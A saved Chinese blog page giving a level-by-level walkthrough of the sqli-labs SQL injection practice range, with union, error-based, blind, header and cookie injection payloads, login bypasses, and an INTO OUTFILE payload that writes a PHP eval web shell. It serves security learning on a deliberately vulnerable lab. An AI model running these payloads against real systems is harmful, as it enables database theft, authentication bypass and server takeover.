<!DOCTYPE html>
<html lang="zh-CN">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="Kage">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Kage">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>sqli-labs 通关1 · 阿杰的小站</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/favicon.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >阿杰的小站</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">sqli-labs 通关1</a>
            </div>
    </div>
    
    <a class="home-link" href=/>阿杰的小站</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            sqli-labs 通关1
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "靶场">靶场</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">2.5k</span>阅读时长: <span class="post-count reading-time">11 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2019/08/23</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h2 id="第一关"><a href="#第一关" class="headerlink" title="第一关"></a>第一关</h2><p><strong>union 注入</strong><br>1.插入转义字符查看报错<br><code>1\</code><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1\’ LIMIT 0,1’ at line 1<br>通过报错可以看到id是用什么包裹的</p>
<p>1.and判断是否存在注入<br><code>1&#39; and 1=1 %23</code><br><code>1&#39; and 1=2 %23</code><br><code>`1&#39; %26%26 1=2 %23</code></p>
<p>2.order by判断字段数<br>因为union注入，必须和前面查询的字段数相同<br><code>1&#39; order by 3 %23</code><br>从大到小依次测试，直到显示成功</p>
<p>3.判断回显位置<br><code>-1&#39; union select 1,2,3 %23</code><br>查询的id号的记录必须为空，才能回显我们自己构造的数据</p>
<p>4.查数据库<br><code>-1&#39; union select 1,group_concat(schema_name),3 from information_schema.schemata%23</code><br>从information_schema数据库中的shcemata表中的schema_name字段查询出所有的数据库名</p>
<p>5.查表<br><code>-1&#39; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23</code><br>从information_schema数据库中的tables表中的table_name字段查询出所有的表名</p>
<p>6.查字段<br><code>-1&#39; union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=&#39;users&#39;%23</code><br>从information_schema数据库中的columns表中的column_name字段查询出所有的字段名</p>
<p>7.查数据<br><code>id=-1&#39; union select 1,group_concat(username),group_concat(password) from security.users%23</code><br>查询出所有数据<br><code>?id=-1&#39; union select 1,username,password from security.users limit 0,1%23</code><br>单个数据查询</p>
<h2 id="第二关"><a href="#第二关" class="headerlink" title="第二关"></a>第二关</h2><p>与第一关类似，区别在于id不用加单引号<br><code>?id=-1 union select 1,username,password from security.users limit 2,1%23</code></p>
<h2 id="第三关"><a href="#第三关" class="headerlink" title="第三关"></a>第三关</h2><p>与第一关类似，区别在于id用(‘’)包裹<br><code>-1&#39;) union select 1,username,password from security.users limit 0,1%23</code></p>
<h2 id="第四关"><a href="#第四关" class="headerlink" title="第四关"></a>第四关</h2><p>与第一关类似，区别在于id用(“”)包裹<br><code>?id=-1&quot;) union select 1,username,password from security.users limit 0,1%23</code></p>
<h2 id="第五关"><a href="#第五关" class="headerlink" title="第五关"></a>第五关</h2><p><strong>可以报错的盲注</strong><br><strong>报错注入：</strong><br>1.报错可以查看包裹字符为<code>&#39;</code><br><code>1\</code></p>
<p>2.and判断包裹字符确实为<code>&#39;</code><br><code>1&#39; and 1=1 %23</code></p>
<p>3.order by判断字段<br><code>1&#39; order by 3 %23</code></p>
<p>4.报错注入<br>注意报错注入依然用union，所以前后字段数需要相同<br>payload1:<br><code>1&#39; union select 1 from (select 1,count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a)b %23</code></p>
<p>payload2:<br><code>1&#39; union select 1 from (select 1,count(*),3 from information_schema.tables group by concat(database(),floor(rand(0)*2)))b %23</code><br>该payload只是payload1的简化</p>
<p>payload3:<br><code>1&#39; union select 1 from (select 1,count(*),3 from (select 1 union select null union select !1) as a group by concat(database(),floor(rand(0)*2)))b %23</code><br>当关键表被禁用可以用这个形式，如information.tables</p>
<p>payload4:<br><code>1&#39; union select 1 from (select min(@a:=1) from information_schema.tables group by concat(database(),@a:=(@a+1)%2))b %23</code><br><code>+</code>号需要url编码，当count(*)和rand()被禁用，可以用该payload</p>
<p>payload5:<br><code>1&#39; union select 1,extractvalue(1,concat(0x7e,(select database()),0x7e)),2 %23</code><br>extractvalue触发xpath报错注入</p>
<p>payload6:<br><code>1&#39; union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1),2 %23</code><br>updatexml触发xpath报错注入</p>
<p>payload7:<br><code>1&#39; union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x %23</code><br>该payload暂时只知道用来查版本</p>
<p><strong>布尔盲注：</strong><br>1.报错可以查看包裹字符为<code>&#39;</code><br><code>1\</code></p>
<p>2.and判断包裹字符确实为<code>&#39;</code><br><code>1&#39; and 1=1 %23</code></p>
<p>3.order by判断字段<br><code>1&#39; order by 3 %23</code></p>
<p>4.ascii和substr配合查询</p>
<blockquote>
<p>ascii：转换为ascii码<br>substr：substr(查询值,1,1)查询第一个字符</p>
</blockquote>
<p><code>1&#39; and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))&gt;0 %23</code><br>id值必须为有效字段，通过判断and后面的bool值来猜出数据的多少，true就显示数据，false就不显示数据</p>
<p>5.编写python脚本爆数据<br>(select schema_name from information_schema.schemata limit 0,1)</p>
<h2 id="第六关"><a href="#第六关" class="headerlink" title="第六关"></a>第六关</h2><p>与第五关类似，区别在于id用<code>&quot;&quot;</code>包裹<br><code>1&quot; and ascii(substr(database(),1,1))&gt;0 %23</code></p>
<h2 id="第七关"><a href="#第七关" class="headerlink" title="第七关"></a>第七关</h2><p><strong>无报错回显的布尔盲注</strong><br>1.插入单引号和双引号<br>单引号报错，双引号不报错，可以判断有单引号包裹<br>2.构造判断语句<br><code>1&#39; and 1=1 %23</code><br>依然报错<br><code>1&#39;)) and 1=1 %23</code><br>不报错<br>可以判断id由<code>((&#39;&#39;))</code>包裹<br>3.写脚本爆数据<br>4.使用<code>into outfile</code><br>先测试<br><code>1&#39;)) and (select count(*) from mysql.user)&gt;0 %23</code><br>显然有权限，然后写入文件<br><code>-1&#39;)) union select 1,&#39;&lt;?php @eval($_post[mima])?&gt;&#39;,3 into outfile &quot;D:\\1.php&quot; %23</code><br>前提，需要知道web文件目录，然后使用菜刀连接，就可以获得shell</p>
<h2 id="第八关"><a href="#第八关" class="headerlink" title="第八关"></a>第八关</h2><p>与第七关类似，区别在于id用<code>&#39;&#39;</code>包裹</p>
<h2 id="第九关"><a href="#第九关" class="headerlink" title="第九关"></a>第九关</h2><p><strong>时间注入</strong></p>
<ol>
<li>通过sleep判断id由什么包裹<br><code>1&#39; and sleep(3) %23</code><br>延迟3秒才加载完成，可以判断id由<code>&#39;&#39;</code>包裹</li>
</ol>
<p>2.通过if函数进行判断</p>
<blockquote>
<p>if(bool,执行True,执行False)</p>
</blockquote>
<p>所以构造payload<br><code>1&#39; and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))&gt;0,sleep(3),1) %23</code><br>延迟3秒，注入成功。</p>
<p>3.编写脚本爆数据</p>
<h2 id="第十关"><a href="#第十关" class="headerlink" title="第十关"></a>第十关</h2><p>与第九关类似，区别在于id用<code>&quot;&quot;</code>包裹</p>
<h2 id="第十一关"><a href="#第十一关" class="headerlink" title="第十一关"></a>第十一关</h2><p><strong>POST类型的union注入</strong><br><strong>登录</strong><br>1.猜测语句<br><code>select * from users where username=&#39;?&#39; and password=&#39;?&#39; %23</code><br>2.在username插入<code>\</code>报错<br>可以判断username和password用<code>&#39;&#39;</code>包裹<br>3.判断是否正确<br><code>uname=1&#39; or 1=1 %23&amp;passwd=</code><br><code>uname=1&#39; or 1=2 %23&amp;passwd=</code><br>通过回显可以判断包裹<br>4.一句话登录<br>如果知道用户名，不用密码可以任意登录<br><code>uname=Dumb&#39; %23&amp;passwd=</code><br>不用用户名和密码，登录任意指定号数的用户<br><code>uname=1&#39; or 1=1 limit 0,1%23&amp;passwd=</code></p>
<p><strong>爆数据</strong><br>1.判断字段<br><code>uname=1&#39; order by 2%23&amp;passwd=</code><br>2.判断回显位置<br><code>uname=1&#39; union select 1,2%23&amp;passwd=</code><br>3.爆数据<br>payload:<code>uname=1&#39; union select database(),2%23&amp;passwd=</code></p>
<h2 id="第十二关"><a href="#第十二关" class="headerlink" title="第十二关"></a>第十二关</h2><p>与第十一关类似，区别在于id用<code>(&quot;&quot;)</code>包裹<br><code>uname=1&quot;) union select database(),2%23&amp;passwd=</code></p>
<h2 id="第十三关"><a href="#第十三关" class="headerlink" title="第十三关"></a>第十三关</h2><p><strong>数据不回显，但是报错的POST注入</strong><br>登录与第十一关类似<br><strong>爆数据</strong><br>报错爆数据<br><code>uname=1&#39;) union select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a %23&amp;passwd=</code><br>通过该语句写脚本爆数据<br><code>uname=1&#39;) or bool 23&amp;passwd=</code></p>
<h2 id="第十四关"><a href="#第十四关" class="headerlink" title="第十四关"></a>第十四关</h2><p>与第十三关类似，区别在于id用<code>&quot;&quot;</code>包裹<br><code>uname=1&quot; union select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a %23&amp;passwd=</code></p>
<h2 id="第十五关"><a href="#第十五关" class="headerlink" title="第十五关"></a>第十五关</h2><p><strong>最像登录的一关，无报错，无回显</strong><br>1.判断id用什么包裹<br><code>uname=1&#39; or 1=1 %23&amp;passwd=</code><br>可以发现id用<code>&#39;&#39;</code>包裹<br>2.通过bool写脚本爆数据</p>
<h2 id="第十六关"><a href="#第十六关" class="headerlink" title="第十六关"></a>第十六关</h2><p>与第十五关类似，区别在于id用<code>(&quot;&quot;)</code>包裹<br><code>uname=1&quot;) or 1=1 %23&amp;passwd=</code></p>
<h2 id="第十七关"><a href="#第十七关" class="headerlink" title="第十七关"></a>第十七关</h2><p><strong>update注入</strong><br>场景可以想象成，我们是一个用户在自己的修改密码页面，进行update注入获得数据信息<br>猜测语句<br><code>update users set password=&#39;?&#39; where username=&#39;?&#39;</code><br>1.测试包裹情况<br><code>uname=admin&#39;&amp;passwd=1</code><br>检测到黑客攻击，应该对uname注入点防范严格<br><code>uname=admin&amp;passwd=1&#39;</code><br>出现报错，password存在注入，password应该用<code>&#39;&#39;</code>包裹<br>2.可以通过and (报错函数)进行爆数据<br><code>update users set password=&#39;?&#39; where username=&#39;?&#39; and (报错函数)</code><br>因此可以构造payload<br><code>update users set password=&#39;?&#39; where username=&#39;?&#39; and (报错函数)</code><br>对于concat类型报错，需要用<code>select 1 from (报错函数)b</code>进行构造<br>payload:<code>uname=admin&amp;passwd=1&#39; and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a)b)%23</code><br>3.时间类型注入<br><code>uname=admin&amp;passwd=2&#39; and if(length((select password from security.users limit 0,1))&gt;0,sleep(0.1),1)%23</code><br>可以写脚本爆数据，但是没法爆修改表的数据，所以有一定缺陷，不知道怎么绕过</p>
<h2 id="第十八关"><a href="#第十八关" class="headerlink" title="第十八关"></a>第十八关</h2><p><strong>http头+insert注入</strong><br>场景：已知自己账号的情况下，服务器随意将用户浏览器添加到数据库中<br>1.看到User-Agent回显，猜测语句<br><code>insert into uagents (uagent, ip_address, username`) VALUES (&#39;?&#39;, &#39;ip&#39;, &#39;name&#39;)</code><br>判断包裹<br><code>{&#39;User-Agent&#39;:&quot;1&#39; and sleep(3) and &#39;1&#39;=&#39;1&quot;}</code><br>可以发现存在注入，id包裹为<code>&#39;&#39;</code><br>2.编写脚本爆数据<br>睡眠语句应该插入在VALUES字段当中才有效果，且前面值必须为True<br>3.注<br>一般http头注入通过编写脚本会更直观一些</p>
<h2 id="第十九关"><a href="#第十九关" class="headerlink" title="第十九关"></a>第十九关</h2><p>与第十八关类似，区别在于http头为Rerferer<br><code>{&#39;Rerferer&#39;:&quot;1&#39; and sleep(3) and &#39;1&#39;=&#39;1&quot;}</code></p>
<h2 id="第二十关"><a href="#第二十关" class="headerlink" title="第二十关"></a>第二十关</h2><p><strong>使用Cookie进行查询的注入</strong><br>场景，通过cookie来查询数据库获得用户信息<br>1.测试cookie，可以发现存在越权<br><code>{&#39;Cookie&#39;:&quot;uname=Dumb&quot;}</code><br>登录为Dumb<br><code>{&#39;Cookie&#39;:&quot;uname=Admin&quot;}</code><br>登录为Admin<br>2.插入<code>\</code><br>出现报错，可以判断出id包裹为<code>&#39;&#39;</code><br>3.无法判断后台语句，可能是插入或者查询<br>我们尝试通用sleep语句来测试<br><code>{&#39;Cookie&#39;:&quot;uname=Dumb&#39; and sleep(3) #&quot;}</code><br>可以发现延迟了3秒钟，因而存在注入<br><code>{&#39;Cookie&#39;:&quot;uname=Dumb&#39; and 1=1 #&quot;}</code><br>这个payload也可以判断出布尔注入<br><code>uname=1&#39; union select 1,2,3 #</code><br>这个payload也可以判断出union注入<br>4.编写脚本或者使用报错函数都可以</p>
<h2 id="第二十一关"><a href="#第二十一关" class="headerlink" title="第二十一关"></a>第二十一关</h2><p><strong>经过base64处理过的cookie查询注入</strong><br>1.测试cookie<br>通过base64解码，得到明文Dumb<br>2.插入’\’<br><code>1\</code><br>经过base64编码，插入cookie中<br>可以发现报错，得到cookie用<code>(&#39;&#39;)</code>来包裹<br>3.payload<br><code>-1&#39;) union select 1,database(),3 #</code></p>
<h2 id="第二十二关"><a href="#第二十二关" class="headerlink" title="第二十二关"></a>第二十二关</h2><p>与第二十一关类似，区别在于cookie用<code>&quot;&quot;</code>包裹<br><code>-1&quot; union select 1,database(),3 #</code></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>通常意义上的普通注入，从输入点分类有GET注入、POST注入、http头注入，从获取数据方式，有union注入、报错注入、布尔盲注、时间注入，从数据库操作方式有select注入、update注入、insert注入。</p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="http://yoursite.com">Kage</a>
            <p>原文链接：<a href="http://yoursite.com/2019/08/23/sqli-labs 通关1/">http://yoursite.com/2019/08/23/sqli-labs 通关1/</a>
            <p>发表日期：<a href="http://yoursite.com/2019/08/23/sqli-labs 通关1/">八月 23日 2019, 11:48:49 晚上</a>
            <p>更新日期：<a href="http://yoursite.com/2019/08/23/sqli-labs 通关1/">August 23rd 2019, 11:48:49 pm</a>
            <p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2019/08/23/跨域实现-jsonp和CORS/" title= "跨域实现-jsonp和CORS">
                    <div class="nextTitle">跨域实现-jsonp和CORS</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2019/08/17/sqli-labs通过2/" title= "sqli-labs通过2">
                    <div class="prevTitle">sqli-labs通过2</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:543251348@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/K4ge" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="/atom.xml" class="iconfont-archer rss" target="_blank" title=rss></a>
            
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#第一关"><span class="toc-number">1.</span> <span class="toc-text">第一关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第二关"><span class="toc-number">2.</span> <span class="toc-text">第二关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第三关"><span class="toc-number">3.</span> <span class="toc-text">第三关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第四关"><span class="toc-number">4.</span> <span class="toc-text">第四关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第五关"><span class="toc-number">5.</span> <span class="toc-text">第五关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第六关"><span class="toc-number">6.</span> <span class="toc-text">第六关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第七关"><span class="toc-number">7.</span> <span class="toc-text">第七关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第八关"><span class="toc-number">8.</span> <span class="toc-text">第八关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第九关"><span class="toc-number">9.</span> <span class="toc-text">第九关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十关"><span class="toc-number">10.</span> <span class="toc-text">第十关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十一关"><span class="toc-number">11.</span> <span class="toc-text">第十一关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十二关"><span class="toc-number">12.</span> <span class="toc-text">第十二关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十三关"><span class="toc-number">13.</span> <span class="toc-text">第十三关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十四关"><span class="toc-number">14.</span> <span class="toc-text">第十四关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十五关"><span class="toc-number">15.</span> <span class="toc-text">第十五关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十六关"><span class="toc-number">16.</span> <span class="toc-text">第十六关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十七关"><span class="toc-number">17.</span> <span class="toc-text">第十七关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十八关"><span class="toc-number">18.</span> <span class="toc-text">第十八关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十九关"><span class="toc-number">19.</span> <span class="toc-text">第十九关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第二十关"><span class="toc-number">20.</span> <span class="toc-text">第二十关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第二十一关"><span class="toc-number">21.</span> <span class="toc-text">第二十一关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第二十二关"><span class="toc-number">22.</span> <span class="toc-text">第二十二关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#总结"><span class="toc-number">23.</span> <span class="toc-text">总结</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
